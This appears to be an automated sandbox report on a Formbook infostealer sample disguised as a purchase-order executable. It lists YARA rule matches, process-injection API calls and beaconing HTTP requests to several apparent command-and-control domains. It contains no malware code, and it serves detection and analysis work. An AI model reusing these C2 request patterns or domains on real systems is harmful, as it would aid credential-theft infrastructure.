            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=SEtDmKR01RO/v1cj8toEclhnh+z+cFCFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7dClcm7p6TyxSZVg==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.instantconvey.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=bB5JTYLqXbmN0Rh+5NINP+PQjDS0UbZCl3xm8ZfdPOYVrj3MpZEcwx/57KsfYAKqEjFN/H+DNeQWefm4mYcz+JoJDCs0w/OhmA==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.domainappraisalbot.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=DTrGbTEHMG6Y4mKy1Dn1KlGSTxAaPAt5CR5S23I4xf5AWU1NMecScwq/Pr/mUgt4GFrPBjE4MJyXMuu59XRudeX+UPGmLlgOAA==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.nesmalt.infoConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=UYUxSke5jkUMcYDKg5c5qeCNAmjygCX5uaIG43dC5thZqMprvLUeD5Feo3aTVHSupyfrGHzleQTbxGW3puedJJnHNv+xYZWaEw==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.611erhm.topConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=pHT1kOem2IT0Y9TOyYUVH8n+JKlTpsv3XSVhoxxlik7UiuURsLT/Jzy3sp/tZoydu20sa6TfNH7nZl1KjnhVFUdGE6T0LcUEcA==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.fam-scharf.netConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=AHFK2pjoxw5zzLKjgIeieoxyeFKGBXiFIXzrT8sRZEqLGYv6y8nhVjDsidhHFHxwb+HDFiGiPRNZnrHWQBMiJvor1pzBMUzxhg==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.magmadokum.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=nB1qtJANgieev8TNIXcafe3NbPYBnXyCXRyPWsB/WMzSWoyZdSlu5bXncPzzIIBEZ/2nP35zxbYs3CtalsMWA7WUc9X1BQW9lg==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.thecoloringbitch.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKsEfLNF+7YeihFeQ==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.altralogos.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=W415zxONlMY0LROALmBwVywFRuOF9MDUrzPBSWER7JgIGEVSpL5hn1DTAqCrj0fiYOesE/vl81lAGPaeX7agy8WUnV35Ak22aw==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.77moea.topConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4

            E-Banking Fraud

            Source: Yara matchFile source: 3.2.PO_YTWHDF3432.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.PO_YTWHDF3432.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3732735204.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3732837802.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3732252302.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1371528010.0000000001E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3732619108.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 3.2.PO_YTWHDF3432.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 3.2.PO_YTWHDF3432.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3732735204.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3732837802.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.3732252302.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1371528010.0000000001E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3732619108.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sampleStatic PE information: Filename: PO_YTWHDF3432.exe
            Source: 0.2.PO_YTWHDF3432.exe.89f0000.14.raw.unpack, RFebBaClhEWIFvwxqU.csLarge array initialization: : array initializer size 9041
            Source: 0.2.PO_YTWHDF3432.exe.29b5318.3.raw.unpack, RFebBaClhEWIFvwxqU.csLarge array initialization: : array initializer size 9041
            Source: 0.2.PO_YTWHDF3432.exe.29e4b30.5.raw.unpack, RFebBaClhEWIFvwxqU.csLarge array initialization: : array initializer size 9041
            Source: PO_YTWHDF3432.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 3.2.PO_YTWHDF3432.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.PO_YTWHDF3432.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3732735204.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3732837802.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.3732252302.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1371528010.0000000001E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3732619108.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0548EFA011_2_0548EFA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05410E5911_2_05410E59
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CEE2611_2_054CEE26
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CEEDB11_2_054CEEDB
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05422E9011_2_05422E90
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CCE9311_2_054CCE93
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0542696211_2_05426962
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054129A011_2_054129A0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054DA9A611_2_054DA9A6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0541A84011_2_0541A840
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0541284011_2_05412840
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_053F68B811_2_053F68B8
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0543E8F011_2_0543E8F0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CAB4011_2_054CAB40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054C6BD711_2_054C6BD7
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0540EA8011_2_0540EA80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054C757111_2_054C7571
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054AD5B011_2_054AD5B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0540146011_2_05401460
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CF43F11_2_054CF43F
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054017EC11_2_054017EC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CF7B011_2_054CF7B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0545563011_2_05455630
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054C16CC11_2_054C16CC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054DB16B11_2_054DB16B
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0544516C11_2_0544516C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_053FF17211_2_053FF172
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0541B1B011_2_0541B1B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054170C011_2_054170C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054BF0CC11_2_054BF0CC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054C70E911_2_054C70E9
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CF0E011_2_054CF0E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054C132D11_2_054C132D
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_053FD34C11_2_053FD34C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0545739A11_2_0545739A
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0542B2C011_2_0542B2C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054B12ED11_2_054B12ED
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054152A011_2_054152A0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05413D4011_2_05413D40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054C1D5A11_2_054C1D5A
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054C7D7311_2_054C7D73
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0542FDC011_2_0542FDC0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05489C3211_2_05489C32
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CFCF211_2_054CFCF2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CFF0911_2_054CFF09
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05411F9211_2_05411F92
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_053D3FD511_2_053D3FD5
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_053D3FD211_2_053D3FD2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CFFB111_2_054CFFB1
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05419EB011_2_05419EB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0541995011_2_05419950
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0542B95011_2_0542B950
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054A591011_2_054A5910
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0547D80011_2_0547D800
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054138E011_2_054138E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CFB7611_2_054CFB76
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05485BF011_2_05485BF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0544DBF911_2_0544DBF9
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_0542FB8011_2_0542FB80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054CFA4911_2_054CFA49
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054C7A4611_2_054C7A46
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05483A6C11_2_05483A6C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054BDAC611_2_054BDAC6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05455AA011_2_05455AA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054ADAAC11_2_054ADAAC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054B1AA311_2_054B1AA3
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02ED1A1011_2_02ED1A10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02ECAEE011_2_02ECAEE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02ECCE6011_2_02ECCE60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02ECCC4011_2_02ECCC40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02ECCC3711_2_02ECCC37
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02ED316B11_2_02ED316B
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02ED317011_2_02ED3170
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02EE751011_2_02EE7510
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: String function: 0196F290 appears 105 times
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: String function: 01937E54 appears 100 times
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: String function: 018DB970 appears 283 times
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: String function: 0195EA12 appears 86 times
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: String function: 01925130 appears 58 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 05445130 appears 58 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0548F290 appears 105 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 053FB970 appears 283 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0547EA12 appears 86 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 05457E54 appears 109 times
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040A953 NtMapViewOfSection,3_2_0040A953
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040A123 NtSetContextThread,3_2_0040A123
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040B213 NtDelayExecution,3_2_0040B213
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040AB73 NtCreateFile,3_2_0040AB73
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040A323 NtResumeThread,3_2_0040A323
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_00428453 NtClose,3_2_00428453
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_00409D23 NtSuspendThread,3_2_00409D23
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040ADA3 NtReadFile,3_2_0040ADA3
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040B623 NtAllocateVirtualMemory,3_2_0040B623
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_00409F23 NtGetContextThread,3_2_00409F23
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040A733 NtCreateSection,3_2_0040A733
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922B60 NtClose,LdrInitializeThunk,3_2_01922B60
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01922DF0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01922C70
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019235C0 NtCreateMutant,LdrInitializeThunk,3_2_019235C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01924340 NtSetContextThread,3_2_01924340
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01924650 NtSuspendThread,3_2_01924650
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922B80 NtQueryInformationFile,3_2_01922B80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922BA0 NtEnumerateValueKey,3_2_01922BA0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922BF0 NtAllocateVirtualMemory,3_2_01922BF0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922BE0 NtQueryValueKey,3_2_01922BE0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922AB0 NtWaitForSingleObject,3_2_01922AB0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922AD0 NtReadFile,3_2_01922AD0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922AF0 NtWriteFile,3_2_01922AF0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922DB0 NtEnumerateKey,3_2_01922DB0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922DD0 NtDelayExecution,3_2_01922DD0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922D10 NtMapViewOfSection,3_2_01922D10
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922D00 NtSetInformationFile,3_2_01922D00
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922D30 NtUnmapViewOfSection,3_2_01922D30
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922CA0 NtQueryInformationToken,3_2_01922CA0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922CC0 NtQueryVirtualMemory,3_2_01922CC0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922CF0 NtOpenProcess,3_2_01922CF0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922C00 NtQueryInformationProcess,3_2_01922C00
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922C60 NtCreateKey,3_2_01922C60
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922F90 NtProtectVirtualMemory,3_2_01922F90
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922FB0 NtResumeThread,3_2_01922FB0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922FA0 NtQuerySection,3_2_01922FA0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922FE0 NtCreateFile,3_2_01922FE0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922F30 NtCreateSection,3_2_01922F30
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922F60 NtCreateProcessEx,3_2_01922F60
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922E80 NtReadVirtualMemory,3_2_01922E80
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922EA0 NtAdjustPrivilegesToken,3_2_01922EA0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922EE0 NtQueueApcThread,3_2_01922EE0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01922E30 NtWriteVirtualMemory,3_2_01922E30
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01923090 NtSetValueKey,3_2_01923090
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01923010 NtOpenDirectoryObject,3_2_01923010
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_019239B0 NtGetContextThread,3_2_019239B0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01923D10 NtOpenProcessToken,3_2_01923D10
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_01923D70 NtOpenThread,3_2_01923D70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05444650 NtSuspendThread,LdrInitializeThunk,11_2_05444650
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05444340 NtSetContextThread,LdrInitializeThunk,11_2_05444340
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442D10 NtMapViewOfSection,LdrInitializeThunk,11_2_05442D10
